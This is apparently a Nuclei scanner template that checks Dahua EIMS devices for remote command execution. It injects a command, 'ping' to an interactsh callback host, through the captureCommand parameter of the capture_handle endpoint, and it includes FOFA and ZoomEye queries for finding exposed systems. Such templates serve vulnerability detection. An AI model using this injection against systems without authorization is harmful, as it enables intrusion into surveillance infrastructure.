2024-03-28 07:30:29 +00:00
|
|
|
id: dahua-eims-rce
|
|
|
|
|
|
|
|
|
|
info:
|
2024-03-28 14:17:45 +00:00
|
|
|
name: Dahua EIMS - Remote Command Execution
|
2024-03-28 07:30:29 +00:00
|
|
|
author: DhiyaneshDk
|
|
|
|
|
severity: critical
|
|
|
|
|
description: |
|
|
|
|
|
Dahua EIMS capture_handle interface allows remote command execution.
|
|
|
|
|
reference:
|
|
|
|
|
- https://github.com/wy876/POC/blob/main/%E5%A4%A7%E5%8D%8EEIMS-capture_handle%E6%8E%A5%E5%8F%A3%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
|
|
|
|
|
- https://cn-sec.com/archives/2554372.html
|
|
|
|
|
metadata:
|
|
|
|
|
verified: true
|
|
|
|
|
max-request: 1
|
|
|
|
|
fofa-query: "<title>eims</title>"
|
|
|
|
|
zoomeye-query: app:"大华 EIMS"
|
|
|
|
|
tags: dahua,rce,eims
|
|
|
|
|
|
|
|
|
|
http:
|
|
|
|
|
- method: GET
|
|
|
|
|
path:
|
|
|
|
|
- "{{BaseURL}}/config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20{{interactsh-url}}%20index.pcap"
|
|
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
|
matchers:
|
|
|
|
|
- type: word
|
|
|
|
|
part: interactsh_protocol
|
|
|
|
|
words:
|
|
|
|
|
- "dns"
|
|
|
|
|
|
2024-03-28 14:17:45 +00:00
|
|
|
- type: regex
|
|
|
|
|
regex:
|
|
|
|
|
- "^success$"
|
2024-03-28 14:27:47 +00:00
|
|
|
# digest: 4a0a0047304502204c8e8f930bb56dc18e15d1246becf227edebef661a92d5db320afc11a1e290030221009c3b72f6ae1afe50d28e4b1bfbc6190ab68dcf37cd5e89f8f7006f19d4f889e1:922c64590222798bb761d5b6d8e72950
|
